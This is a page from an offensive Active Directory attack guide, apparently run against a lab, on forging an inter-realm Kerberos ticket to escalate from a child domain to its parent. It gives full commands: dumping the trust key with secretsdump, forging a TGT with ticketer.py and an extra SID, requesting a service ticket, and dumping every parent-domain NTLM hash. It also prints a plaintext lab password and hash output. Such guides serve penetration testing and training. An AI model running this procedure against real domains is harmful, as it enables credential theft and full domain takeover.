Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  1. Trust
  2. Domain Trust - child/parent (north.newyork.local -> newyork.local)

Trust ticket - forge inter-realm TGT

PreviousGolden ticket + ExtraSidNextForest Trust (newyork.local -> maryland.local)

Last updated 2 years ago

  • Another way to escalate from child to parent is by extracting the trust key and use it to create our trust ticket (a very good explanation and examples with Mimikatz can be found here : )

  • The trust key can be found by targeting the netbios name of the domain on the ntds

secretsdump.py -just-dc-user 'NEWYORK$' \
 north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11
 
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:8d20b70ca945f979ff4ac5928e6f7397b43a3737ac9b1ee2579294c584bbe49e
newyork$:aes128-cts-hmac-sha1-96:05c2cc6747982c155cc82ccae92b8475
newyork$:des-cbc-md5:6e647ff89b08b089
[*] Cleaning up...

  • Now we got the trust key we can forge the ticket just like we done with the krbtgt user hash but this time we will set the spn : krbtgt/parent_domain

ticketer.py -nthash 59f1453dcd3f2fdc8c52f38693806154 \ #newyork$ hash
 -domain-sid S-1-5-21-3634065772-4036021599-3644360361 \ #north.newyork.local SID
 -domain north.newyork.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \ #newyork.local SID + Extra-SID
 -spn krbtgt/newyork.local trustfakeuser

  • Now we will use the forged TGT to ask a ST on the parent domain

export KRB5CCNAME=/home/jefe/delegation/trustfakeuser.ccache

getST.py -k -no-pass -spn cifs/nyc.newyork.local \
 newyork.local/trustfakeuser@newyork.local -debug

  • And now we can use our service ticket :)

  • connect with smbclient

export KRB5CCNAME=/workspace/trusts/trustfakeuser@newyork.local@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
smbclient.py -k -no-pass trustfakeuser@nyc.newyork.local

  • or even dump secrets

secretsdump.py -k -no-pass -just-dc-ntlm trustfakeuser@nyc.newyork.local
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Donald.Trump:1113:aad3b435b51404eeaad3b435b51404ee:5c4af7d7a0e3091678e947c3ed151b81:::
hugo.Chavez:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080:::
mateo.Pacheco:1115:aad3b435b51404eeaad3b435b51404ee:1ff4aa72d776c5834ba4893ab192f016:::
nicolas.Maduro:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998:::
marco.Lopez:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe:::
ramon.Maldonado:1118:aad3b435b51404eeaad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
rafael.Smith:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce:::
diego.Montenegro:1120:aad3b435b51404eeaad3b435b51404ee:af41d274ce3ba74423fbe596cf944710:::
lorenzo.Cruz:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210:::
jesus.Puello:1122:aad3b435b51404eeaad3b435b51404ee:2c1854ada028754e5d16113cab23fe5d:::
martin.Osuna:1123:aad3b435b51404eeaad3b435b51404ee:02166150bda700bc7be38198179b20fc:::
NYC$:1001:aad3b435b51404eeaad3b435b51404ee:0a38be3c64921d206de05e782d09edb0:::
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
maryland$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
https://adsecurity.org/?p=1588